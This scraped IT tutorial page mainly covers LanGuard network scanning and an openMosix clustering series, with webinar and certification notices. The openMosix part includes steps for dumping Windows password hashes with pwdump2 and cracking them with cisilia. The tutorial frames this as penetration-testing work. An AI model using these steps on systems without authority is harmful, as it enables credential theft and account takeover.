gfi-languard-scan-network-and-discover-vulnerable-unpatched-high-risk-systems-1aThis article shows how any IT Administrator, network engineer or security auditor can quickly scan a network using GFI’s LanGuard and identify the different systems such as Windows, Linux, Android etc. More importantly, we’ll show how to uncover vulnerable, unpatched or high-risk Windows systems including Windows Server 2003, Windows Server 2008, Windows Server 2012 R2, Domain Controllers, Linux Servers such as RedHat Enterprise, CentOS, Ubuntu, Debian, openSuse, Fedora, any type of Windows workstation (XP, Vista, 7, 8, 8.1,10) and Apple OS X.

GFI’s LanGuard is a swiss-army knife that combines a network security tool, vulnerability scanner and patching management system all in one package. Using the network scanning functionality, LanGuard will automatically scan the whole network and use the provided credentials to log into every located host and discover additional vulnerabilities.

To begin, we launch GFI LanGuard and at the startup screen, select the Scan Tab as shown below:

gfi-languard-scan-network-and-discover-vulnerable-unpatched-high-risk-systems-1

Figure 1. Launching GFI LanGuard 2015

Next, in the Scan Target section, select Custom target properties (box with dots) and click on Add new rule. This will bring us to the final window where we can add any IP address range or CIDR subnet:

 

Figure 2. Adding your IP Network – Subnet to LanGuard for scanning

Now enter the IP address range you would like LanGuard to scan, e.g 192.168.5.1 to 192.168.5.254 and click OK.

The new IP address range should now appear in the Custom target properties window:

gfi-languard-scan-network-and-discover-vulnerable-unpatched-high-risk-systems-3

Figure 3. Custom target properties displays selected IP address range

Now click on OK to close the Custom target properties window and return back to the Scan area:

gfi-languard-scan-network-and-discover-vulnerable-unpatched-high-risk-systems-4

Figure 4. Returning back to LanGuard’s Scan area

At this point, we can enter the credentials (Username/Password) to be used for remotely accessing hosts discovered (e.g domain administrator credentials is a great idea) and selectively click on Scan Options to reveal additional useful options to be used during our scan, such as Credential Settings and Power saving options. Click on OK when done:

gfi-languard-scan-network-and-discover-vulnerable-unpatched-high-risk-systems-5

Figure 5. Additional Scan Options in GFI’s LanGuard 2015

We can now hit Scan to begin the host discovery and scan process:

gfi-languard-scan-network-and-discover-vulnerable-unpatched-high-risk-systems-6

Figure 6. Initiating the discovery process in GFI LanGuard 2015

GFI LanGuard will being scanning the selected IP subnet and list all hosts found in the Scan Results Overview window area. As shown in the above screenshot, each host will be identified according to its operating system and will be accessed for open ports, vulnerabilities and missing operating system & application patches.

The full scan profile selected will force GFI LanGuard to run a complete detailed scan of every host.

Once complete, GFI LanGuard 2015 displays a full report summary for every host and an overal summary for the network:

gfi-languard-scan-network-and-discover-vulnerable-unpatched-high-risk-systems-7

Figure 7. GFI LanGuard 2015 overall scan summary and results

Users can select each host individually from the left window and their Scan Results will be diplayed on the right window area (Scan Results Details). This method allows quick navigation through each host, but also allows the administrator or network security auditor to quickly locate specific scan results they are after.

This article explained how to configure GFI LanGuard 2015 to scan an IP subnet network, identify host operating systems, log into remote systems, scan for vulnerabilities, missing operating system and application patches, open ports and other critical security issues. IT Managers, network engineers and security auditors should defiantely try GFI LanGuard and see how easy & automated their job can become with such a powerfull network security tool in their hands.

  • Hits: 13706

OpenMosix - Part 9: Interesting Ideals: Distributed Password Cracking & Encoding MP3s

Now that you hopefully have a nice powerful cluster running, there are hundreds of different ways you can use it. The most obvious use is any activity that takes a long time and uses a large amount of CPU processing power and/or RAM. We're going to show you a couple of projects that have benefited us in the real world.

Bear in mind that there are some applications that migrate very nicely over an openMosix cluster, for example 'make' when you're compiling can speed up your compile times significantly. If you do a little research on the net, you'll find examples of applications that will migrate well and which won't yield much speed increase. If you are a developer looking to take advantage of openMosix, applications that fork() child processes will migrate wonderfully, whereas multithreaded applications at present, do not seem to migrate threads.

Anyway, here are a couple of cool uses for your cluster:

Distributed Password Cracking

If your role is in security role or if you work as a penetration tester, you'll probably encounter the need to crack passwords at some point or other. We regularly use l0phtcrack for Windows passwords, but were interested by the opportunity to use our nice new 10 system cluster to significantly speed things up. After briefly hunting around the net, we discovered 'Cisilia', which is a Linux based Windows LM / NTLM password cracker designed specifically to take advantage of openMosix style clustering!

You can get a copy of cisilia by visiting the following site and clicking on the R&D Projects menu on the left: http://www.citefa.gov.ar/SitioSI6_EN/si6.htm

There you'll find two files, 'cisilia' which is the actual command line based password cracking engine and 'xisilia' which is an X based GUI for the same. We didn't install the X based GUI, since we were working with our cluster completely over SSH.

Once you download the RPMs, you can install them by typing:

rpm -ivh *isilia*.rpm

If you installed from the tarball sources like we did, it is just as simple:

1) Unzip the tarball

tar xvzf cisilia*.tar.gz

2) Enter the directory and configure the compilation process for your system:

./configure

3) Finally, start the compilation process:

make

Now you need to get a Windows password file to crack. For this you'll want to use pwdump to grab the encrypted password hashes. This is available at the following link:

https://packetstormsecurity.com/files/13790/pwdump2.zip.html

Unzip it and run it on the Windows box which has the passwords you want to crack. You will want to save the results to a file, so do the following:

pwdump2 > passwdfile

Now copy the file 'passwdfile' across to a node in your cluster. Fire up cisilia using the following command:

cisilia -l crack_file -n 20 <path to the passwdfile you copied>

•  -l   tells cisilia to save the results to a file called crack_file

•  -n  tells cisilia how many processes it should spawn. We started 20, since we wanted 2 processes to go to each node in the cluster.

We were pleasantly surprised by how quickly it started running through 6-7 character alphanumeric passwords. Enjoy !

Encoding MP3s

Do you get annoyed by how long it takes to convert a CD to MP3? Or to convert any kind of media file?

This is one of the places where a cluster excels. When you convert your rips to MP3, you only process one WAV file at a time, how about you run it on your cluster and let it simultaneously encode all your MP3s?

Someone has already taken this to the absolute extreme, check out http://www.rimboy.com/cluster/ for what he's got setup.

To quickly rip a CD and convert it to digital audio, you will need 2 programs:

A digital audio extractor, and an audio encoder.

For the digital audio extractor we recommend Cdparanoia. For the audio encoder, we're going to do things a bit differently:

In the spirit of the free open source movement, we suggest you check out the OGG Vorbis encoder. This is a free, open audio compression standard that will compress your WAV files much better than MP3, and still have a higher quality!

They also play perfectly in Winamp and other media players. Sounds too good to be true? Check out their website at the link below. Of course if you still aren't convinced that OGG is better than MP3, you can replace the OGG encoder with any MP3 encoder for this tutorial.

Get and install both the cdparanoia ripper and the oggenc encoder from the following URLs:

CDparanoia - http://www.xiph.org/paranoia/

OGG Vorbis Encoder - https://xiph.org/vorbis/

Now we just need to rip and encode on our cluster. Put the CD you want to convert in the drive on one node, and just run the following:

cdparanoia -B

for i in `ls *.wav`;

do oggenc $i &

done;

This encodes your WAV files to OGG format at the default quality level of 3, which produces an OGG file of a smaller size and significantly better sound quality than an MP3 at 128kbps. You can experiment with the OGG encoder options to figure out the best audio quality for your requirements.

This just about completes the openmosix tutorial we've prepaired for you.

We surely hope it has been an enlighting tutorial and will help most of you make some good use of those old 'mini super computers' you never knew you had :)

Back to the Linux/Unix Section or OpenMosix Section.

  • Hits: 17086

OpenMosix - Part 8: Using SSH Keys Instead Of Passwords

One of the things that you'll notice with openMosixview is that if you want to change the speed sliders of a remote node, you will have some trouble. This is because openMosixview uses SSH to remotely set the speed on the node. What you need to do is set up passwordless SSH authentication using public/private keys.

This is just a quick walk-through on how to do that, for a much more detailed explanation on public/private key SSH authentication, see our tutorial in the GNU/Linux Section.

First, generate your SSH public/private key-pair:

ssh-keygen -t dsa

Second, copy the public key into the authorized keys file. Since your home directory is shared between nodes, you only need to do this on one node:

cat ~/.ssh/*.pub >>~/.ssh/authorized_keys

However, for root, you will have to do this manually for each node (replace Node# with each node individually):

cat ~/.ssh/*.pub >>/mfs/Node#/root/.ssh/authorized_keys

After this, you have to start SSH-agent, to cache your password so you only need to type it once. Add the following to your .bash_profile or .profile:

ssh-agent $SHELL

Now each time after you login, just type ‘ ssh-add' and supply your password once. By following this you will be able to login passwordless to any of the nodes, and the sliders in openMosixview should work perfectly for you. Next: Interesting Ideals: Distributed Password Cracking & Encoding MP3s

  • Hits: 15773

OpenMosix - Part 7: The openMosix File System

You've probably been wondering how openMosix handles things like file read/writes when a process migrates to another node.

For example, if we run a process that needs to read some data from a file /etc/test.conf on our local machine, if this process migrates to another node, how will openMosix read that file ? The answer is in the openMosix File System, or OMFS.

OMFS does several things. Firstly, it shares your disk between all the nodes in the cluster, allowing them to read and write to the relevant files. It also uses what is known as Direct File System Access (DFSA), which allows a migrated process to run many system calls locally, rather than wasting time executing them on the home node. It works somewhat like NFS, but has features that are required for clustering.

If you installed openMosix from the RPMs, the omfs should already be created and automatically mounted. Have a look in /mfs, and you will see a subdirectory for every node in the cluster, named after the node ID. These directories will contain the shared disks of that particular node.

You will also see some symlinks like the following:

here -> maps to the current node where your process runs

home -> maps to your home node

If the /mfs directory has not been created, you can mount it manually with the following:

mkdir /mfs

mount /mfs /mfs -t mfs

If you want it to be automatically mounted at boot time, you can create the following entry in your /etc/fstab

mfs_mnt /mfs mfs dfsa=1 0 0

Bear in mind that this entry has to be on all the nodes in the cluster. Lastly, you can turn the openMosix file system off using the command:

mosctl nomfs

Now that we've got that all covered, it's time to take a look on how you can make the ssh login process less time consuming, allowing you to take control of all your cluster nodes any time you require, but also help the cluster system execute special functions. Next topic covers using SSH keys with openMosix instead of passwords.

  • Hits: 16042

OpenMosix - Part 6: Controlling Your OpenMosix Cluster

The openMosix team have provided a number of ways of controlling your cluster, both from the command line, as well as through GUI based tools in X.

From the command line, the main monitoring and control tools are:

  • mosmon – which shows you the load on each of the nodes, their speed, memory usage, etc. Pressing 'h' will bring up the help with the different options;
  • mosctl - which is a very powerful command that allows you to control how your system behaves in the cluster, some of the interesting options are:
    • mosctl block – this stops other people's processes being run on your system (a bit selfish don't you think ;))
    • mosctl -block – the opposite of the above
    • mosctl lstay – this stops your local processes migrating to other nodes for processing
    • mosctl nolstay – the opposite of the above
    • mosctl setspeed <number> - which sets the max processing speed to contribute. 10000 is a benchmark of a Pentium 3 1Ghz.
    • mosctl whois <node number> - this tells you the IP address of a particular node
    • mosctl expel – this expels any current remote processes and blocks new ones from coming in
    • mosctl bring – this brings back any of your own local processes that have migrated to other nodes
    • mosctl status <node number> - which shows you whether the node is up and whether it is 'blocking' processes, 'staying' them, etc.
    • mosrun - allows you to run a process controlling which nodes it should run on
    • mps - this is just like 'ps' to show you the process listing, but it also shows which node a process is running on
    • migrate - this command allows you to manually migrate a process to any node you like, the syntax for using it is 'migrate <pid> <node #>'. You can also use 'migrate <pid> balance' to load balance a process automatically.
    • dsh - Distributed Shell. This allows you to run a command on all the nodes simultaneously. For example ‘ dsh -a reboot ' will reboot all the nodes.

From the GUI, you can just start 'openmosixview'. This allows you to view and manage all the nodes in your cluster. It also shows you the load balancing efficiency of the cluster in near-real-time. You can also see what is the total speed and RAM that your cluster is providing you:

linux-openmosix-controlling-cluster-1

We should note that all cluster nodes that are online are represented with the green colour, while all offline cluster with the red colour.

One of the neatest things about 'openmosixview' is the GUI for controlling process migration.

linux-openmosix-controlling-cluster-2

It depicts your current node at the center, and other nodes in the cluster around it. The ring around your node represents the processes running on your local box. If you hover over any of them you can see the process name and PID. Whenever one of your processes migrates to another node, you will see it detach and appear on a new node with a line linking it to your system!

You can also manually control the migration. You can drag and drop your processes onto other nodes, even selecting multiple processes and then dragging them to another node is easy. If you double click on a process running on a remote node, it will come back home and execute locally.

You can also open the openMosix process monitor which shows you which process is running on which node.

There is also a history analyzer to show you the load over a period of time. This allows you to see how your cluster was being used at any given point in time:

linux-openmosix-controlling-cluster-3

As you can see, the GUI tools are very powerful, they provide you with a large amount of the functionality that the command line tools do. If, however, you want to make your own scripts, the command line tools are much more versatile. Managing a cluster can be a lot of fun, modify the options and play around with the GUI to tweak and optimize your raw processing power!! Our next article covers The openMosix File System.

  • Hits: 16410

OpenMosix - Part 5: Testing Your Cluster

Now let's actually make this cluster do some work! There is a quick tool you can use to monitor the load of your cluster.

Type 'mosmon' and press enter. You should see a screen similar to the screenshot below:

linux-openmosix-testing-cluster-1

 

Run mosmon in one VTY (press ctrl+alt+f1), then switch to another VTY (ctrl+alt+f2)

Let's run a simple awk command to run a nested loop and use up some processing power. If everything went well, we should see the load in mosmon jump up on one node, and then migrate to the other nodes.

The command you need to run is:

awk 'BEGIN {for(i=0;i<10000;i++)for(j=0;j<10000;j++);}'

If you choose to, you can start multiple awk processes by backgrounding them. Just append an ‘&' to the command line and run it a few times.

Go back to mosmon by pressing ctrl+alt+f1, you should see the load rising on your current node, and then slowly distributing to the other machines in the cluster like in the picture below:

linux-openmosix-testing-cluster-2

Congratulations! You are now taking advantage of multi system clustering!

If you want you can time the process running locally, turn off openmosix by entering the command:

/etc/init.d/openmosix stop

Then run the following script:

#!/bin/sh

date

awk 'BEGIN {for(i=0;i<10000;i++)for(j=0;j<10000;j++);}'

date

This will tell you how long it took to perform the task. You can modify the loop values to make it last longer. Now restart openmosix, using the command:

/etc/init.d/openmosix start

Re-run the script to see how long it takes to process. Remember that your network is a bottleneck for performance. If your process finishes really quickly, it won't have time to migrate to the other nodes over the network. This is where tweaking and optimizing your cluster becomes fun.

Next up we'll take a look on how you can control a OpenMosix cluster.

  • Hits: 15187

OpenMosix - Part 4: Starting Up Your OpenMosix Cluster

Okay, so now you've got a couple of machines with openMosix installed and booted, it's time to understand how to add systems to your cluster and make them work together.

OpenMosix has two ways of doing this:

1. Auto-discovery of Cluster Nodes

OpenMosix includes a daemon called 'omdiscd' which identifies other openMosix nodes on the network by using multicast packets (for more on multicasting, please see our multicast page). This means that you don't have to bother manually configuring the nodes. This is a simple way to get your cluster going as you just need to boot a machine and ensure it's on the network. When this stage is complete, it should then discover the existing cluster and add itself automatically!

Make sure you set up your network properly. As an example, if you are assigning an IP address of 192.168.1.10 to your first ethernet interface and your default gateway is 192.168.1.1 you would do something like this:

ifconfig eth0 192.168.1.1 netmask 255.255.255.0 broadcast 192.168.1.255 up (configure's your system's ethernet interface)

route add default gw 192.168.1.1 (adds the default gateway)

The auto-discovery daemon might have started automatically on bootup, check using:

ps aux | grep 'omdiscd'

The above command should reveal the 'omdiscd' process running on your system.

If it hasn't, you can manually start by typing 'omdiscd'. If you want to see the nodes getting added, you can choose to run omdiscd in the foreground by typing 'omdiscd -n'. This will help you troubleshoot the auto-discovery.

2. The /etc/openmosix.map File Configuration

If you don't want to use autodiscovery, you can manually manage your nodes using the openmosix.map file in the /etc directory. This file basically contains a list of the nodes on your cluster, and has to be the same across all the nodes in your cluster.

The syntax is very simple, it is a tab delimited list of the nodes in your cluster. There are 3 fields:

Node ID, IP Address and Number.

•  Node ID is the unique number for the node.

•  IP address is the IP address of the node.

•  Number specifies how many nodes in the range after the IP.

As an example, if you have nodes

192.168.1.10

192.168.1.11

192.168.1.12

192.168.1.50

your file would look like this:

1 192.168.1.10 2

2 192.168.1.50 1

We could have manually specified the IP's 192.168.1.11 and 192.168.1.12, but by using the 'number' field, openmosix counts up the last octet of the IP, and saves you the trouble of making individual entries.

Once you've done your configuration, you can control openMosix using the init.d script that should have been installed. If they were not, you can find it in the scripts directory of the userland tools you downloaded, make it executable and copy it to the init.d directory like this:

mv ./openmosix /etc/init.d

chmod 755 /etc/init.d/openmosix

You can now start, stop and restart openMosix with the following commands:

/etc/init.d/openmosix start

/etc/init.d/openmosix stop

/etc/init.d/openmosix restart

Next up we'll take a look on how you can test your new openMosix cluster!

  • Hits: 17090

OpenMosix - Part 3: Using ClusterKnoppix

So maybe none of those methods worked for you. Well, you'll be happy to know that you can get a cluster up and running within a few minutes using an incredible bootable Knoppix liveCD that is preconfigured for clustering. It's called ‘ClusterKnoppix' and a quick search on Google will reveal a number of sources from where you can download the ISO images.

The best thing about Cluster Knoppix, is that you can just boot a system with the CD and it will automatically add itself to the cluster. You don't even need to install the O/S to your hard disk. This makes it a very useful way to setup a cluster in a hurry using pre-existing systems.

Another really nice feature is that you don't need to burn 20 copies of the CD to make a 20 system cluster. Just boot one system with the CD, and then run the command

knoppix-terminalopenmosixserver

This will let you setup a clustering-enabled terminal-server. Now if you have any systems that can boot from their network card (PXE compliant booting), they will automatically download a kernel image and run Cluster Knoppix!

It's awesome to see this at work, especially since we were working with 2 systems that didn't have a CD-ROM drive or a hard-disk. They just became diskless clients and contributed their resources to the cause! Next page covers starting up your openMosix Cluster.

  • Hits: 20575

OpenMosix - Part 2: Building An openMosix Cluster

Okay, let's get down to the fun part! Although it may sound hard, setting up a cluster is not very difficult, we're going to show you the hard way (which will teach you more) as well as a very neat quick way to set up an instant cluster using a Knoppix Live CD. We suggest you try both out to understand the benefits of each approach.

We will require the following:

1. Two or more machines (we need to cluster something!), the configuration doesn't matter even if they are lower end. They will require network cards and need to be connected to each other over a network. Obviously, the more systems you have, the more powerful your cluster will be. Don't worry if you don't have many machines, we'll show you how to temporarily use resources from systems and schedule when they can contribute their processing power (this works very well in an office when you might want some systems to join the cluster only after office hours).

2. A Cluster Knoppix LiveCD for the second part of this tutorial. While this is not strictly necessary, we want to show you some of the advantages of using the LiveCD for clustering. It also makes setting up the cluster extremely easy. You can get a fully working cluster up in the amount of time it takes you to boot a system ! You can get Cluster Knoppix from the following link: https://distrowatch.com/table.php?distribution=clusterknoppix

Getting & Installing openMosix

OpenMosix consists of two parts, the first is the kernel patch which does the actual clustering and the second is the userland tools that allow you to monitor and control your cluster.

There are a variety of ways to install openMosix, we've chosen to show three of them:

1. Patching the kernel and installing from the source

2. Installing from RPM's

3. Installing in Debian

1. Installing from source

The latest version of openMosix at the time of this writing works with the kernel version 2.4.24. If you want to do this the proper way, get the plain kernel sources for 2.4.24 from https://www.kernel.org/ and the openMosix patch for the same version of the kernel from https://sourceforge.net/projects/openmosix/

At the time of writing this, the direct kernel source link is

http://www.kernel.org/pub/linux/kernel/v2.4/linux-2.4.24.tar.bz2

Once you've got the kernel sources, unpack them to your kernel source directory, in this case that should be:

/usr/src/linux-2.4.24

Now move the openMosix patch to the kernel source directory and apply it, like so:

mv /root/openMosix-2.4.24.gz /usr/src/linux-2.4.24

cd /usr/src/linux-2.4.24

zcat openMosix-2.4.24.gz | patch -Np1

NOTE: If you downloaded a bzip zipped file, you might need to use 'bzcat' rather than 'zcat' in the last line.

Now your kernel sources are patched with openMosix.

Now you have to configure your kernel sources, using one of the following commands:

make config

make menuconfig (uses an ncurses interface)

make xconfig (uses a TCL/TK GUI interface)

If you use X and have a recent distribution, 'make xconfig' is your best bet. Once you get the kernel configuration screens, enable the following openMosix options in the kernel configuration:

CONFIG_MOSIX=y

# CONFIG_MOSIX_TOPOLOGY is not set

CONFIG_MOSIX_UDB=y

# CONFIG_MOSIX_DEBUG is not set

# CONFIG_MOSIX_CHEAT_MIGSELF is not set

CONFIG_MOSIX_WEEEEEEEEE=y

CONFIG_MOSIX_DIAG=y

CONFIG_MOSIX_SECUREPORTS=y

CONFIG_MOSIX_DISCLOSURE=3

CONFIG_QKERNEL_EXT=y

CONFIG_MOSIX_DFSA=y

CONFIG_MOSIX_FS=y

CONFIG_MOSIX_PIPE_EXCEPTIONS=y

CONFIG_QOS_JID=y

Feel free to tweak your other kernel settings based on your hardware and requirements just as you would when installing a new kernel.

Finally, finish it all off by compiling the kernel with:

make dep bzImage modules modules_install

Now install your new kernel in your bootloader. For example, if you use LILO, edit your /etc/lilo.conf and create a new entry for your openMosix enhanced kernel. If you simply copy the entry for your regular kernel and change the kernel image to point to your new kernel, this should be enough. Don't forget to run 'lilo' when you finish editing the file.

After you have completed this, reboot, and if all went well, you should be able to select the openMosix kernel you just installed and boot with it. If something didn't work right, you can still select your regular kernel and boot normally to troubleshoot.

2. Installing from RPM

If you have an RPM based distribution, you can directly get a pre-compiled kernel image with openMosix enabled from the openMosix site (https://sourceforge.net/projects/openmosix/).

This is a fairly easy way to install openMosix as you just need to install 2 RPMs. This should work with Red Hat, SUSE etc. Get the two latest RPMs for the

a) openmosix-kernel

b) openmosix-tools

Now you can simply install both of these by using the command:

rpm -Uvh openmosix*.rpm

If you are using GRUB, the RPM's will even make the entry in your GRUB config so you can just reboot and select the new kernel. If you use LILO you will have to manually make the entry in /etc/lilo.conf. Simply copying the entry for your regular kernel and changing the kernel image to point to your new kernel should be enough. Don't forget to run 'lilo' when you finish editing the file.

That should be all you need to do for the RPM based installation. Just reboot and choose the openMosix kernel when you are given the choice.

3. Installing in Debian

You can install the RPM's in Debian as well as using Alien, but it is better to use apt-get to install the kernel sources and openmosix kernel patch. You can also use the 'apt-get' command to install openmosixview, which will give you a GUI to manage the cluster.

This is the basic procedure needed to follow for installing openMosix under Debian.

First, get the packages:

cd /usr/src

apt-get install kernel-source-2.4.24 kernel-package \

openmosix kernel-patch-openmosix

Untar them and create the links:

tar vxjf kernel-source-2.4.24.tar.bz2

ln -s /usr/src/kernel-source-2.4.24 /usr/src/linux

Apply the patch:

cd /usr/src/linux

../kernel-patches/i386/apply/openmosix

Install the kernel:

make menuconfig

make-kpkg kernel_image modules_image

cd ..

dpkg -i kernel-image-*-openmosix-*.deb

After this you can use 'apt-get' to install the openmosixview GUI utility for managing your cluster using the following command:

apt-get install openmosixview

Assuming you've successfully installed ClusterKnoppix, your ready to start using it - which also happens to be the topic of the next section:  Using ClusterKnoppix

  • Hits: 26127

OpenMosix - Part 1: Understanding openMosix

As we said before, openMosix is a single system image clustering extension for the Linux kernel. It has its roots in the extremely popular MOSIX clustering project, the main difference being that it is distributed under the GNU General Public License.

It allows a cluster of computers to behave like one big multi-processor computer. For example, if you run 2 processes on a single machine, each process will only get 50% of the CPU time. However, if you run both these processes over a 2 node cluster, each process will get 100% CPU time since there are two processors available. In essence, this behavior is very similar to SMP (Symmetric Multi-Processor) systems.

Diving Deeper

What openMosix does is balance the processing load over the systems in the cluster, taking into account the speed of the systems and the load they already have. Note however, that it does not parallelize the processing. Each individual process only runs on one computer at a time.

To quote the openMosix website example :

'If your computer could convert a WAV to a MP3 in a minute, then buying another nine computers and joining them in a ten-node openMosix cluster would NOT let you convert a WAV in six seconds. However, what it would allow you to do is convert 10 WAVs simultaneously. Each one would take a minute, but since you can do lots in parallel you'd get through your CD collection much faster.'

This simultaneous processing has a lot of uses, as there are many tasks that adapt extremely well to being used on a cluster. In the later sections, we'll show you some practical and fun uses for an openMosix based GNU/Linux cluster. Next: Building An openMosix Cluster

 

  • Hits: 16371

FREE WEBINAR: Microsoft Azure Certifications Explained - A Deep Dive for IT Professionals in 2020

It’s common knowledge, or at least should be, that certifications are the most effective way for IT professionals to climb the career ladder and it’s only getting more important in an increasingly competitive professional marketplace. Similarly, cloud-based technologies are experiencing unparalleled growth and the demand for IT professionals with qualifications in this sector are growing rapidly. Make 2020 your breakthrough year - check out this free upcoming FREE webinar hosted by two Microsoft cloud experts to plan your Azure certification strategy in 2020

microsoft azure certifications explained

The webinar features a full analysis of the Microsoft Azure certification landscape in 2020, giving you the knowledge to properly prepare for a future working with cloud-based workloads. Seasoned veterans Microsoft MVP Andy Syrewicze and Microsoft cloud expert Michael Bender will be hosting the event which includes Azure certification tracks, training and examination costs, learning materials, resources and labs for self-study, how to gain access to FREE Azure resources, and more. 

Altaro’s webinars are always well attended and one reason for this is the encouragement for attendee participation. Every single question asked is answered and no stone is left unturned by the presenters. They also present the event live twice to allow as many people as possible to have the chance of attending the event and asking their questions in person! 

For IT professionals in 2020, and especially those with a Microsoft ecosystem focus, this event is a must-attend! 

The webinar will be held on Wednesday February 19, at 3pm CET/6am PST/9am EST and at again 7pm CET/10am PST/1pm EST. I’ll be attending so I’ll see you there!

While the event date has passed, it has been recorded and is available for viewing. All material are available as direct downloads. Click here to access the event.

  • Hits: 3692

Free Webinar: Azure Security Center: How to Protect Your Datacenter with Next Generation Security

azure security center webinarSecurity is a major concern for IT admins and if you’re responsible for important workloads hosted in Azure, you need to know your security is as tight as possible. In this free webinar, presented by Thomas Maurer, Senior Cloud Advocate on the Microsoft Azure Engineering Team, and Microsoft MVP Andy Syrewicze, you will learn how to use Azure Security Center to ensure your cloud environment is fully protected.

There are certain topics in the IT administration world which are optional but security is not one of them. Ensuring your security knowledge is ahead of the curve is an absolute necessity and becoming increasingly important as we are all becoming exposed to more and more online threats every day. If you are responsible for important workloads hosted in Azure, this webinar is a must!

The webinar covers:

  • Azure Security Center introductions
  • Deployment and first steps
  • Best practices
  • Integration with other tools
  • And much more!

Being an Altaro-hosted webinar, expect this webinar to be packed full of actionable information presented via live demos so you can see the theory put into practice before your eyes. Also, Altaro put a heavy emphasis on interactivity, encouraging questions from attendees and using engaging polls to get instant feedback on the session. To ensure as many people as possible have this opportunity, Altaro present the webinar live twice so pick the best time for you and don’t be afraid to ask as many questions as you like!

Webinar: Azure Security Center: How to Protect Your Datacenter with Next Generation Security
Date: Tuesday, 30th July
Time: Webinar presented live twice on the day. Choose your preferred time:

  • 2pm CEST / 5am PDT / 8am EDT
  • 7pm CEST / 10am PDT / 1pm EDT

 While the event date has passed, it has been recorded and is available for viewing. All material are available as direct downloads. Click here to access the event.

azure security center webinar

  • Hits: 8241

Major Cisco Certification Changes - New Cisco CCNA, CCNP Enterprise, Specialist, DevNet and more from Feb. 2020

new cisco certification paths Feb 2020Cisco announced a major update to their CCNA, CCNP and CCIE certification program at Cisco Live last week, with the changes happening on the 24th  February 2020.

CCNA & CCENT Certification

The 10 current CCNA tracks (CCNA Routing and Switching, CCNA Cloud, CCNA Collaboration, CCNA Cyber Ops, CCNA Data Center, CCNA Industrial, CCNA Security, CCNA Service Provider, CCNA Wireless and CCNA Design) are being retired and replaced with a single ‘CCNA’ certification. The new CCNA exam combines most of the information on the current CCNA Routing and Switching with additional wireless, security and network automation content.

A new Cisco Certified DevNet Associate certification is also being released to satisfy the increasing demand in this area.

The current CCENT certification is being retired. There hasn’t been an official announcement from Cisco yet but rumours are saying that we might be seeing new ‘Foundations’ certifications which will focus on content from the retiring CCNA tracks.

CCNP Certification

Different technology tracks remain at the CCNP level. CCNP Routing and Switching, CCNP Design and CCNP Wireless are being consolidated into the new CCNP Enterprise, and CCNP Cloud is being retired. A new Cisco Certified DevNet Professional certification is also being released.

Only two exams will be required to achieve each CCNP certification – a Core and a Concentration exam. Being CCNA certified will no longer be a prerequisite for the CCNP certification.

If you pass any CCNP level exams before February 24 2020, you’ll receive badging for corresponding new exams and credit toward the new CCNP certification.

new cisco certification roadmap 2020

Click to Enlarge

CCIE Certification

The format of the CCIE remains largely the same, with a written and lab exam required to achieve the certification. The CCNP Core exam will be used as the CCIE Written exam though, there will no longer be a separate written exam at the CCIE level. Automation and Network Programmability are being added to the exams for every track.

All certifications will be valid for 3 years under the new program so you will no longer need to recertify CCIE every 2 years.

How the Changes Affect You

If you’re currently studying for any Cisco certification the advice from Cisco is to keep going. If you pass before the cutover your certification will remain valid for 3 years from the date you certify. If you pass some but not all CCNP level exams before the change you can receive credit towards the new certifications.

We've added a few resources to which you can turn to an obtain additional information:

The Flackbox blog has a comprehensive video and text post covering all the changes.

The official Cisco certification page is here.

  • Hits: 29234

Free Azure IaaS Webinar with Microsoft Azure Engineering Team

free azure iaas webinar with microsoft azure engineering teamImplementing Infrastructure as a Service (IaaS) is a great way of streamlining and optimizing your IT environment by utilizing virtualized resources from the cloud to complement your existing on-site infrastructure. It enables a flexible combination of the traditional on-premises data center alongside the benefits of cloud-based subscription services. If you’re not making use of this model, there’s no better opportunity to learn what it can do for you than in the upcoming webinar from Altaro: How to Supercharge your Infrastructure with Azure IaaS.

The webinar will be presented by Thomas Maurer, who has recently been appointed Senior Cloud Advocate, on the Microsoft Azure Engineering Team alongside Altaro Technical Evangelist and Microsoft MVP Andy Syrewicze.

The webinar will be primarily focused on showing how Azure IaaS solves real use cases by going through the scenarios live on air. Three use cases have been outlined already, however, the webinar format encourages those attending to suggest their own use cases when signing up and the two most popular suggestions will be added to the list for Thomas and Andy to tackle. To submit your own use case request, simply fill out the suggestion box in the sign up form when you register!

Once again, this webinar is going to presented live twice on the day (Wednesday 13th February). So if you can’t make the earlier session (2pm CET / 8am EST / 5am PST), just sign up for the later one instead (7pm CET / 1pm EST / 10am PST) - or vice versa. Both sessions cover the same content but having two live sessions gives more people the opportunity to ask their questions live on air and get instant feedback from these Microsoft experts.

Save your seat for the webinar!

Free IaaS Webinar with Microsoft Azune Engineering Team

While the event date has passed, it has been recorded and is available for viewing. All material are available as direct downloads. Click here to access the event.

  • Hits: 5523

Altaro VM Backup v8 (VMware & Hyper-V) with WAN-Optimized Replication dramatically reduces Recovery Time Objective (RTO)

Altaro, a global leader in virtual machine data protection and recovery, has introduced WAN-Optimized Replication in its latest version, v8, allowing businesses to be back up and running in minimal time should disaster strike. Replication permits a business to make an ongoing copy of its virtual machines (VMs) and to access that copy with immediacy should anything go wrong with the live VMs. This dramatically reduces the recovery time objective (RTO).

VMware and Hyper-V Backup

Optimized for WANs, Altaro's WAN-Optimized Replication enables system administrators to replicate ongoing changes to their virtual machines (VMs) to a remote site and to seamlessly continue working from the replicated VMs should something go wrong with the live VMs, such as damage due to severe weather conditions, flooding, ransomware, viruses, server crashes and so on.

Drastically Reducing RTO

"WAN-Optimized Replication allows businesses to continue accessing and working in the case of damage to their on-premise servers. If their office building is hit by a hurricane and experiences flooding, for instance, they can continue working from their VMs that have been replicated to an offsite location," explained David Vella, CEO and co-founder of Altaro Software.

"As these are continually updated with changes, businesses using Altaro VM Backup can continue working without a glitch, with minimal to no data loss, and with an excellent recovery time objective, or RTO."

Click here to download your free copy now of Altaro VMware Backupfree copyClick here to download your free copy now of Altaro VMware Backup

Centralised, Multi-tenant View For MSPs

Managed Service Providers (MSPs) can now add replication services to their offering, with the ability to replicate customer data to the MSP's infrastructure. This way, if a customer site goes down, that customer can immediately access its VMs through the MSP's infrastructure and continue working.

With Altaro VM Backup for MSPs, MSPs can manage their customer accounts through a multi-tenant online console for greater ease, speed and efficiency, enabling them to provide their customers with a better, faster service.

How To Upgrade

WAN-Optimized Replication is currently available exclusively for customers who have the Unlimited Plus edition of Altaro VM Backup. It is automatically included in Altaro VM Backup for MSPs.

Upgrading to Altaro VM Backup v8 is free for Unlimited Plus customers who have a valid Software Maintenance Agreement (SMA). The latest build can be downloaded from this page. If customers are not under active SMA, they should contact their Altaro Partner for information about how to upgrade.

